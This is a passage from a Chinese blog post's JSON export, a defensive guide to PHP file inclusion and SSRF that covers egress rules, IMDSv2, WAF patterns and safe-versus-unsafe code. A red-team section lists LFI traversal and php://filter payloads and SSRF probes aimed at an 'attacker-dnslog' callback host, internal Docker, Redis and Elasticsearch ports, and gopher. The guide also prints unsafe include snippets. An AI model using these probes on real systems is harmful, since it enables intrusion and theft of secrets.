\u4f7f\u7528\u5e93\u4e0e\u51fd\u6570\u7684\u5b89\u5168\u66ff\u4ee3<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u4e0d\u8981<\/strong>\u7528\u00a0<code>include<\/code>\u00a0\u52a0\u8f7d\u8fdc\u7a0b URL\u3002<\/li>\n\n\n\n<li>\u5bf9\u4e8e HTTP \u8bf7\u6c42\uff0c\u4f7f\u7528 cURL \u5e76\u8bbe\u7f6e\u00a0<code>CURLOPT_RESOLVE<\/code>\u3001<code>CURLOPT_CONNECTTIMEOUT<\/code>\u3001<code>CURLOPT_TIMEOUT<\/code>\u5e76\u6821\u9a8c\u8fd4\u56de\u7684 IP\u3002<\/li>\n\n\n\n<li>\u82e5\u5fc5\u987b\u5141\u8bb8\u67d0\u4e9b\u5916\u90e8\u57df\u540d\uff0c\u89e3\u6790\u5b83\u4eec\u7684 IP \u5e76\u68c0\u67e5\u975e\u79c1\u6709\u7f51\u6bb5\u540e\u518d\u8bf7\u6c42\u3002<\/li>\n<\/ul>\n\n\n\n<p>\u793a\u4f8b\uff08curl + host resolve check\uff09\uff1a<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$host = parse_url($url, PHP_URL_HOST);\n$ips = dns_get_record($host, DNS_A+DNS_AAAA);\n$ip = $ips&#x5B;0]&#x5B;&#039;ip&#039;] ?? $ips&#x5B;0]&#x5B;&#039;ipv6&#039;] ?? 
null;\nif (is_private_ip($ip)) throw new Exception(&#039;forbidden&#039;);\n$ch = curl_init($url);\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\ncurl_setopt($ch, CURLOPT_TIMEOUT, 5);\ncurl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);\n$response = curl_exec($ch);\n\n<\/pre><\/div>\n\n\n<p>\u6ce8\u610f DNS \u6c61\u67d3\u6216\u77ed\u671f\u6539\u53d8\u4ecd\u53ef\u80fd\u7ed5\u8fc7\u3002\u4e0a\u4f8b\u53ea\u53d6\u9996\u6761\u89e3\u6790\u8bb0\u5f55\uff0c\u4e14 curl \u53d1\u8d77\u8fde\u63a5\u65f6\u4f1a\u518d\u6b21\u89e3\u6790\u57df\u540d\uff0c\u4e24\u6b21\u89e3\u6790\u4e4b\u95f4\u53ef\u80fd\u88ab\u5207\u6362\u4e3a\u5185\u7f51\u5730\u5740\uff1b\u5e94\u68c0\u67e5\u5168\u90e8\u8fd4\u56de\u8bb0\u5f55\uff0c\u5e76\u7528 <code>CURLOPT_RESOLVE<\/code> \u628a\u8fde\u63a5\u56fa\u5b9a\u5230\u5df2\u6821\u9a8c\u7684 IP\u3002\u6700\u7a33\u59a5\u7684\u662f&nbsp;<strong>\u7981\u6b62\u540e\u7aef\u8bbf\u95ee\u79c1\u6709\u7f51\u6bb5<\/strong>\uff08\u7f51\u7edc\u5c42\u9762\uff0c\u800c\u4e0d\u662f\u4ec5\u9760\u5e94\u7528\u5c42\uff09\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e94\u3001\u8fd0\u7ef4\u4e0e\u7f51\u7edc\u5c42\u9762\u9632\u62a4\uff08\u66f4\u9ad8\u53ef\u4fe1\u5ea6\uff09<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">1) \u7f51\u7edc\u51fa\u53e3\u7b56\u7565\uff08\u5f3a\u70c8\u5efa\u8bae\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5728\u4e91\/\u5bbf\u4e3b\u673a\u4e0a\u914d\u7f6e egress ACL\uff08\u5b89\u5168\u7ec4\uff09\uff0c\u7981\u6b62 Web \u670d\u52a1\u5668\u53d1\u8d77\u5230\u5185\u7f51\/169.254.169.254 \u7b49\u654f\u611f\u5730\u5740\u7684\u8bf7\u6c42\uff08\u9664\u975e\u786e\u6709\u9700\u6c42\uff09\u3002<\/li>\n\n\n\n<li>\u5141\u8bb8\u5916\u51fa\u8bf7\u6c42\u53ea\u80fd\u5230\u767d\u540d\u5355 IP \u6216\u901a\u8fc7\u4ee3\u7406\u3002<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">2) \u4e91\u5143\u6570\u636e\u5b89\u5168\uff08\u4e91\u5e73\u53f0\u4e13\u7528\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>AWS\uff1a\u542f\u7528 IMDSv2\uff08\u5f3a\u5236 token\uff09\uff0c\u5c3d\u91cf\u7981\u7528 IMDSv1\u3002<\/li>\n\n\n\n<li>GCP\/Azure\uff1a\u5bf9\u5143\u6570\u636e\u670d\u52a1\u91c7\u53d6\u7c7b\u4f3c\u4fdd\u62a4\u6216\u9650\u5236 
access\u3002<\/li>\n\n\n\n<li>\u7f51\u7edc\u5c42\u9762\u901a\u8fc7\u4e3b\u673a\u9632\u706b\u5899\u4e3b\u52a8\u963b\u65ad\u00a0<code>169.254.169.254<\/code>\u00a0\u7684\u51fa\u7ad9\uff08iptables\u3001\u4e91\u5b89\u5168\u7ec4\uff09\u3002<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">3) \u4f7f\u7528 WAF \u4e0e\u6d41\u91cf\u8fc7\u6ee4<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u914d\u7f6e WAF \u89c4\u5219\u62e6\u622a\u5e38\u89c1 LFI\/SSRF payload\uff08<code>php:\/\/<\/code>,\u00a0<code>gopher:\/\/<\/code>,\u00a0<code>etc\/passwd<\/code>,\u00a0<code>..\/<\/code>\u00a0\u7b49\uff09\uff0c\u4f46 WAF \u4e0d\u80fd\u66ff\u4ee3\u4ee3\u7801\u4fee\u590d\u3002<\/li>\n\n\n\n<li>WAF \u53ef\u963b\u65ad\u5e38\u89c1\u626b\u63cf\/\u5927\u91cf\u8bf7\u6c42\uff0c\u964d\u4f4e\u81ea\u52a8\u5316\u653b\u51fb\u6210\u529f\u7387\u3002<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">4) \u5bb9\u5668\u4e0e\u6700\u5c0f\u6743\u9650<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u628a Web \u5e94\u7528\u8fd0\u884c\u5728\u975e root \u7684\u5bb9\u5668\/\u7528\u6237\u4e0b\u3002<\/li>\n\n\n\n<li>\u786e\u4fdd\u5bb9\u5668\u6ca1\u6709\u6302\u8f7d\u4e3b\u673a\u654f\u611f\u76ee\u5f55\uff08\/var\/run\/docker.sock\u3001\/etc\uff09\u3002<\/li>\n\n\n\n<li>\u4f7f\u7528\u7f51\u7edc\u7b56\u7565\uff08K8s NetworkPolicy\uff09\u9650\u5236 Pod \u7684\u5916\u51fa\u8bbf\u95ee\u3002<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u516d\u3001\u5b9e\u64cd\u68c0\u6d4bPayload\u4e0e\u590d\u73b0\u6280\u5de7\uff08\u7ea2\u961f\u5f0f\uff09<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\">LFI \u68c0\u6d4b payloads\uff08\u5feb\u901f\uff09\uff1a<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>..\/..\/..\/..\/etc\/passwd<\/code><\/li>\n\n\n\n<li><code>..\/..\/..\/..\/proc\/self\/environ<\/code>\uff08\u67e5\u770b Request Header 
\u6ce8\u5165\uff09<\/li>\n\n\n\n<li><code>php:\/\/filter\/convert.base64-encode\/resource=...<\/code>\uff08\u8bfb\u53d6\u6e90\u7801\uff09<\/li>\n\n\n\n<li><code>\/var\/log\/nginx\/access.log<\/code>\u3001<code>\/var\/log\/apache2\/access.log<\/code><\/li>\n\n\n\n<li>\u5c1d\u8bd5\u4e0d\u540c\u6587\u4ef6\u6269\u5c55\u4e0e\u7f16\u7801\uff1a<code>%2e%2e%2f<\/code>\u3001<code>..%2f..%2f<\/code>\u3001<code>..%252f<\/code>\uff08double-encoding\uff09<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">SSRF \u63a2\u6d4b\u65b9\u6cd5\uff1a<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5411\u63a5\u53e3\u63d0\u4ea4\u80fd\u89e6\u53d1 DNS \u56de\u8c03\u7684 URL\uff1a<code>http:\/\/attacker-dnslog\/&lt;random><\/code>\uff0c\u770b\u662f\u5426\u751f\u6210 DNS \u67e5\u8be2\uff08\u4f7f\u7528 interactsh\/Burp Collaborator\uff09\u3002<\/li>\n\n\n\n<li>\u8bbf\u95ee\u5185\u90e8\u7aef\u53e3\u5217\u8868\u00a0<code>http:\/\/127.0.0.1:2375\/<\/code>\uff08Docker API\uff09\u3001<code>http:\/\/127.0.0.1:9200\/<\/code>\uff08Elasticsearch\uff09\u3001<code>http:\/\/127.0.0.1:6379\/<\/code>\uff08Redis HTTP gateway\uff09\uff0c\u89c2\u5bdf\u54cd\u5e94\u65f6\u95f4\/\u5185\u5bb9\u5dee\u5f02\u3002<\/li>\n\n\n\n<li>\u6d4b\u8bd5 gopher payloads \u6765\u4e0e memcached \u6216 redis \u5efa\u7acb TCP \u4ea4\u4e92\uff08\u9ad8\u7ea7\u7528\u6cd5\uff0c\u9700\u719f\u6089\u534f\u8bae\uff09\u3002<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e03\u3001\u81ea\u52a8\u5316\u68c0\u6d4b\u4e0eCI\u96c6\u6210<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u9759\u6001\u4ee3\u7801\u5206\u6790<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>SonarQube\uff08\u5e26\u5b89\u5168\u89c4\u5219\uff09\u3001RIPS\u3001PhpStan + \u5b89\u5168\u63d2\u4ef6\u3001Psalm + 
plugin-security\u3002<\/li>\n\n\n\n<li>\u4f7f\u7528\u89c4\u5219\u626b\u63cf\u00a0<code>include\/require<\/code>\u00a0\u7684\u53c2\u6570\u6765\u6e90\uff0c\u68c0\u6d4b\u00a0<code>allow_url_include<\/code>\uff0c\u68c0\u6d4b file operations \u76f4\u63a5\u7528\u5230\u00a0<code>$_GET<\/code>\/<code>$_POST<\/code>\u3002<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">\u52a8\u6001\u626b\u63cf\uff08CI\uff09<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u628a\u5e38\u89c1 LFI\/SSRF payload \u6ce8\u5165\u6d4b\u8bd5\u7528\u4f8b\u4f5c\u4e3a\u96c6\u6210\u6d4b\u8bd5\uff08\u9ed1\u76d2\/\u7070\u76d2\uff09\u7684\u4e00\u90e8\u5206\u3002<\/li>\n\n\n\n<li>\u4f7f\u7528 OWASP ZAP \u6216 Burp \u7684 CI \u96c6\u6210\u626b\u63cf API\u3002<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u516b\u3001\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u8865\u6551\uff08\u88ab\u5229\u7528\u540e\u7684\u5904\u7406\uff09<\/h1>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u7acb\u523b\u65ad\u7f51\u6216\u9650\u5236\u51fa\u7ad9\u6d41\u91cf\uff08\u9694\u79bb\u53d7\u5f71\u54cd\u4e3b\u673a\uff09\u3002<\/li>\n\n\n\n<li>\u91c7\u96c6\u5185\u5b58\/\u78c1\u76d8\u5feb\u7167\uff08\u7528\u4e8e\u53d6\u8bc1\uff09\u5e76\u4fdd\u5168\u65e5\u5fd7\u3002<\/li>\n\n\n\n<li>\u67e5\u770b webserver\/log \u6587\u4ef6\u3001\u4e0a\u4f20\u76ee\u5f55\u3001cron jobs \u662f\u5426\u88ab\u4fee\u6539\u3002<\/li>\n\n\n\n<li>\u626b\u63cf\u4e00\u904d\u7cfb\u7edf\u662f\u5426\u6709 WebShell\uff08\u67e5\u627e\u00a0<code>&lt;?php<\/code>\u00a0\u5173\u952e\u5b57\u3001eval\u3001base64_decode \u7b49\uff09\u3002<\/li>\n\n\n\n<li>\u66f4\u6539\u6240\u6709\u66b4\u9732\u5bc6\u94a5\uff08\u82e5\u6000\u7591\u5143\u6570\u636e\u6cc4\u9732\uff09\u5e76\u91cd\u65b0\u90e8\u7f72\u3002<\/li>\n\n\n\n<li>\u5728\u4fee\u8865\u5b8c\u4ee3\u7801\u540e\u6062\u590d\u670d\u52a1\uff0c\u5e76\u505a\u5b8c\u6574\u7684\u56de\u5f52\u6d4b\u8bd5\u4e0e\u6f0f\u6d1e\u590d\u6d4b\u3002<\/li>\n<\/ol>\n\n\n\n<hr 
class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e5d\u3001\u5b9e\u7528\u4ee3\u7801\u7247\u6bb5\u6c47\u603b\uff08\u5b89\u5168 vs \u4e0d\u5b89\u5168\u5bf9\u7167\uff09<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\">\u4e0d\u5b89\u5168\uff1a\u76f4\u63a5 include \u7528\u6237\u8f93\u5165<\/h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\ninclude $_GET&#x5B;&#039;file&#039;];\n\n<\/pre><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u5b89\u5168\uff1a\u767d\u540d\u5355 + realpath<\/h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$map = &#x5B;\n    &#039;home&#039; =&gt; &#039;\/var\/www\/html\/pages\/home.php&#039;,\n    &#039;about&#039; =&gt; &#039;\/var\/www\/html\/pages\/about.php&#039;,\n];\n$key = $_GET&#x5B;&#039;page&#039;] ?? &#039;home&#039;;\nif (!isset($map&#x5B;$key])) { http_response_code(404); exit; }\ninclude $map&#x5B;$key];\n\n<\/pre><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u4e0d\u5b89\u5168\uff1a\u76f4\u63a5 file_get_contents($_GET[&#8216;url&#8217;])<\/h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n$data = file_get_contents($_GET&#x5B;&#039;url&#039;]);\n\n<\/pre><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u5b89\u5168\uff1a\u89e3\u6790+IP\u767d\u540d\u5355+curl<\/h3>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nfunction is_private_ip($ip) {\n    \/\/ \u68c0\u67e5 RFC1918\u3001127.0.0.1\u3001169.254.169.254\u3001::1 \u7b49\n    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {\n        return true;\n    }\n    return false;\n}\n\n$url = $_GET&#x5B;&#039;url&#039;];\n$parse = parse_url($url);\nif (!$parse || !in_array($parse&#x5B;&#039;scheme&#039;], 
&#x5B;&#039;http&#039;,&#039;https&#039;])) {\n    throw new Exception(&#039;invalid url&#039;);\n}\n$host = $parse&#x5B;&#039;host&#039;];\n$records = dns_get_record($host, DNS_A + DNS_AAAA);\n$ip = $records&#x5B;0]&#x5B;&#039;ip&#039;] ?? $records&#x5B;0]&#x5B;&#039;ipv6&#039;] ?? null;\nif (!$ip || is_private_ip($ip)) {\n    throw new Exception(&#039;forbidden host&#039;);\n}\n$ch = curl_init($url);\ncurl_setopt_array($ch, &#x5B;\n    CURLOPT_RETURNTRANSFER =&gt; true,\n    CURLOPT_TIMEOUT =&gt; 5,\n    CURLOPT_CONNECTTIMEOUT =&gt; 3,\n]);\n$out = curl_exec($ch);\n\n<\/pre><\/div>\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u6ce8\u610f\uff1a\u4e0a\u9762\u5224\u65ad\u4ecd\u53ef\u88ab DNS rebinding \u6216\u77ed\u65f6\u95f4 DNS TTL \u653b\u51fb\u7ed5\u8fc7\u3002\u8981\u7a33\u59a5\u5fc5\u987b\u505a&nbsp;<strong>\u7f51\u7edc\u5c42\u9650\u5236<\/strong>\uff08\u7981\u6b62\u8bbf\u95ee\u5185\u7f51\u5730\u5740\uff09\u6216\u8d70\u5185\u90e8\u4ee3\u7406\u3002<\/p>\n<\/blockquote>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u5341\u3001\u9644\uff1a\u5b9e\u7528\u53c2\u8003\u6e05\u5355\uff08\u5feb\u901f\u6267\u884c\uff09<\/h1>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5728 php.ini \u4e2d\uff1a<code>allow_url_include = Off<\/code>\uff0c<code>allow_url_fopen = Off<\/code>\uff08\u82e5\u53ef\u884c\uff09\u3002<\/li>\n\n\n\n<li>\u786e\u4fdd\u00a0<code>.user.ini<\/code>\u00a0\u6216\u865a\u62df\u4e3b\u673a\u914d\u7f6e\u4e0d\u4f1a\u8986\u76d6\u8fd9\u4e9b\u8bbe\u7f6e\u5bfc\u81f4\u8fdc\u7a0b\u5305\u542b\u53ef\u7528\u3002<\/li>\n\n\n\n<li>\u4e0a\u4f20\u76ee\u5f55\u653e\u5728 webroot \u4e4b\u5916\uff0c\u6216 webserver \u7981\u6b62 PHP 
\u6267\u884c\u3002<\/li>\n\n\n\n<li>\u5728\u4ee3\u7801\u4e2d\u5bf9\u6240\u6709\u6587\u4ef6\/URL\u8f93\u5165\u4f7f\u7528\u767d\u540d\u5355\u6216\u6620\u5c04\u3002<\/li>\n\n\n\n<li>利用防火墙\/安全组禁止服务器对内部敏感地址（169.254.169.254 元数据服务、127.0.0.1:2375 Docker API、2379\/2380 etcd 等）的出站连接。注意云安全组管不到本机回环流量，发往 127.0.0.1 的请求要靠主机防火墙（例如 iptables OUTPUT 链按 php-fpm 运行用户匹配后拒绝）或把 PHP 进程放进独立的网络命名空间来限制；同时这些内部服务自身也应只绑定 unix socket 或强制认证，不要依赖「只有本机能访问」。<\/li>\n\n\n\n<li>启用云元数据的安全模式（如 AWS IMDSv2：把实例设为 HttpTokens=required 强制只接受 v2，并把响应 hop limit 设为 1；实例只是「支持」v2 而没有禁用 v1，对 SSRF 没有任何防护效果）。<\/li>\n\n\n\n<li>在 CI 中加入 SAST（Psalm 开启 <code>--taint-analysis<\/code> 可以追踪 $_GET 等污点源到 include\/curl 等 sink；PhpStan + 安全规则）与 DAST（ZAP）扫描。<\/li>\n\n\n\n<li>日志与监控：记录每次服务器端外联的目标 host\/IP 及对应的请求 ID，重点告警对 169.254.169.254、10\/8 等内网地址的访问尝试，以及 include 参数中出现 <code>..\/<\/code>、<code>php:\/\/<\/code>、<code>phar:\/\/<\/code> 的请求；同时关注非预期的外部请求、异常大流量或频繁 4xx\/5xx。<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ed3\u8bed\u4e0e\u4e0b\u4e00\u6b65\u5efa\u8bae<\/h1>\n\n\n\n<p>\u8fd9\u4efd\u6307\u5357\u5df2\u8986\u76d6\u4ece\u4ee3\u7801\u5230\u7f51\u7edc\u5c42\u3001\u4ece\u68c0\u6d4b\u5230\u4fee\u590d\u7684\u5b8c\u6574\u8def\u5f84\u3002\u4e0b\u4e00\u6b65\u6211\u53ef\u4ee5\u4e3a\u4f60\u505a\u5176\u4e2d\u4efb\u610f\u4e00\u9879\u7684\u201c\u843d\u5730\u5de5\u4f5c\u201d\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u4ee3\u7801\u5ba1\u8ba1\u811a\u672c<\/strong>\uff1a\u626b\u63cf\u9879\u76ee\u4e2d\u6240\u6709\u00a0<code>include\/require\/file_get_contents\/curl_exec<\/code>\u00a0\u7684\u5371\u9669\u7528\u6cd5\u5e76\u8f93\u51fa\u53ef\u7591\u4f4d\u7f6e\uff08\u81ea\u52a8\u5316 SAST 
\u5c0f\u5de5\u5177\uff09\u3002<\/li>\n\n\n\n<li><strong>\u8865\u4e01\u793a\u4f8b<\/strong>\uff1a\u628a\u4f60\u73b0\u6709\u7684\u67d0\u6bb5\u6709\u95ee\u9898\u7684\u4ee3\u7801\u8d34\u7ed9\u6211\uff0c\u6211\u5e2e\u4f60\u6539\u5199\u6210\u5b89\u5168\u7248\u672c\u5e76\u7ed9\u51fa\u6d4b\u8bd5\u7528\u4f8b\u3002<\/li>\n\n\n\n<li><strong>\u68c0\u6d4b\u811a\u672c<\/strong>\uff1a\u7ed9\u4f60\u4e00\u4e2a\u7528\u4e8e\u6d4b\u8bd5 SSRF\/LFI \u7684 Burp \u6269\u5c55\u6216 curl \u5217\u8868\uff08\u5305\u542b interactsh \u96c6\u6210\uff09\u3002<\/li>\n\n\n\n<li><strong>\u8fd0\u7ef4\u65b9\u6848<\/strong>\uff1a\u6309\u4f60\u4e91\u5382\u5546\uff08AWS \/ GCP \/ \u963f\u91cc\u4e91\uff09\u5b9a\u5236\u7f51\u7edc egress \u4e0e IMDS \u9632\u62a4\u811a\u672c\u3002<\/li>\n<\/ol>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e0b\u9762\u662f\u4e00\u4efd\u9762\u5411\u5f00\u53d1\u8005\u548c\u5b89\u5168\u5de5\u7a0b\u5e08\u7684\u6df1\u5165\u6307\u5357\uff0c\u8986\u76d6&nbsp;PHP \u4e2d\u7684\u6587\u4ef6\u5305\u542b&#8230; <a class=\"more-link\" href=\"https:\/\/www.52runoob.com\/index.php\/2025\/12\/08\/php%e5%ae%89%e5%85%a8%e6%bc%8f%e6%b4%9e%e4%b9%8b%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab%e4%b8%8essrf%e6%94%bb%e5%87%bb%e5%85%a8%e8%a7%a3%e6%9e%90\/\">Continue Reading 
&rarr;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[51],"tags":[],"class_list":["post-641","post","type-post","status-publish","format-standard","hentry","category-php-"],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/posts\/641","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/comments?post=641"}],"version-history":[{"count":1,"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/posts\/641\/revisions"}],"predecessor-version":[{"id":642,"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/posts\/641\/revisions\/642"}],"wp:attachment":[{"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/media?parent=641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/categories?post=641"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.52runoob.com\/index.php\/wp-json\/wp\/v2\/tags?post=641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}